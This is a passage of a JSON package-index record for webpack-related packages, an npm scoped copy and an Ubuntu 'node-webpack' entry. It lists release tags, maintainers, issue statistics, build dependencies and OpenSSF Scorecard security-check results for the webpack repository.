:"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-30T14:55:25.188Z","dependent_packages_count":1,"downloads":4,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":54.149426065477414,"dependent_repos_count":25.32799796580169,"dependent_packages_count":16.223928578504864,"stargazers_count":0.08519633301126976,"forks_count":0.5290750012268107,"average":19.26312478880441},"purl":"pkg:npm/%40xigua_front/webpack","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@xigua_front/webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@xigua_front/webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@xigua_front/webpack/dependencies","status":"removed","funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T00:25:47.755Z","issues_count":10165,"pull_requests_count":9450,"avg_time_to_close_issue":10849647.758436048,"avg_time_to_close_pull_request":2768513.495560301,"issues_closed_count":9898,"pull_requests_closed_count":8897,"pull_request_authors_count":1445,"issue_authors_count":6686,"avg_comments_per_issue":5.8349237579931135,"avg_comments_per_pull_request":3.1827513227513227,"merged_pull_requests_count":6033,"bot_issues_count":8,"bot_pull_requests_count":2915,"past_year_issues_count":80,"past_year_pull_requests_count":940,"past_year_avg_time_to_close_issue":868643.701754386,"past_year_avg_time_to_close_pull_request":361830.065948856,"past_year_issues_closed_count":57,"past_year_pull_requests_closed_count":743,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4625,"past_year_avg_comments_per_pull_request":4.925531914893617,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":590,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1089,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":442,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":83,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@xigua_front%2Fwebpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@xigua_front%2Fwebpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@xigua_front%2Fwebpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@xigua_front%2Fwebpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@xigua_front%2Fwebpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@xigua_front%2Fwebpack/codemeta","maintainers":[{"uuid":"cuveecui","login":"cuveecui","name":null,"email":"cuizaiyong@xigua.city","url":null,"packages_count":17,"html_url":"https://www.npmjs.com/~cuveecui","role":null,"created_at":"2022-11-11T06:21:53.285Z","updated_at":"2022-11-11T06:21:53.285Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/cuveecui/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":13460230,"name":"node-webpack","ecosystem":"ubuntu","description":null,"homepage":"https://github.com/webpack/webpack","licenses":"mit","normalized_licenses":[],"repository_url":"https://github.com/webpack/webpack","keywords_array":["universe/misc"],"namespace":"universe","versions_count":1,"first_release_published_at":"2026-02-09T07:31:55.268Z","latest_release_published_at":"2026-02-09T07:31:55.268Z","latest_release_number":"5.76.1+dfsg2+~cs10.8.15-3","last_synced_at":"2026-03-09T08:14:29.600Z","created_at":"2026-02-09T07:31:54.956Z","updated_at":"2026-08-22T19:35:50.607Z","registry_url":"https://launchpad.net/ubuntu/+source/node-webpack","install_command":"apt-get install node-webpack","documentation_url":null,"metadata":{"component":"universe","architecture":"all","priority":"optional","binary":"webpack","standards_version":"4.6.2","maintainer":"Debian Javascript Maintainers \u003cpkg-javascript-devel@lists.alioth.debian.org\u003e","build_depends":"debhelper-compat (= 13), dh-nodejs, dh-sequence-nodejs, jest (\u003e= 29) \u003c!nocheck\u003e, node-acorn (\u003e= 8.5.0+ds+~cs24.17.6~), node-envinfo, node-babel7, node-browserslist \u003c!nocheck\u003e, node-chrome-trace-event \u003c!nocheck\u003e, node-colorette, node-commander, node-enhanced-resolve \u003c!nocheck\u003e, node-es-module-lexer, node-eslint-scope \u003c!nocheck\u003e, node-eslint-visitor-keys, node-esrecurse \u003c!nocheck\u003e, node-estraverse \u003c!nocheck\u003e, node-events \u003c!nocheck\u003e, node-findup-sync \u003c!nocheck\u003e, node-graceful-fs \u003c!nocheck\u003e, node-interpret (\u003e= 2.2~) \u003c!nocheck\u003e, node-json-parse-better-errors \u003c!nocheck\u003e, node-libs-browser \u003c!nocheck\u003e, node-loader-runner \u003c!nocheck\u003e, node-mime-types \u003c!nocheck\u003e, node-neo-async \u003c!nocheck\u003e, node-p-limit \u003c!nocheck\u003e, node-rechoir, node-resolve-cwd \u003c!nocheck\u003e, node-rollup-plugin-commonjs, node-rollup-plugin-json, node-rollup-plugin-node-resolve, node-rollup-plugin-terser, node-schema-utils \u003c!nocheck\u003e, node-supports-color \u003c!nocheck\u003e, node-tapable (\u003e= 2.0~), node-typescript, node-watchpack \u003c!nocheck\u003e, node-webassemblyjs (\u003e= 1.9.1+dfsg+~cs11.9.35~) \u003c!nocheck\u003e, node-webpack-merge (\u003e= 5.8.0~), node-webpack-sources (\u003e= 3.2.1~) \u003c!nocheck\u003e, node-yargs \u003c!nocheck\u003e, rollup, terser \u003c!nocheck\u003e","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using 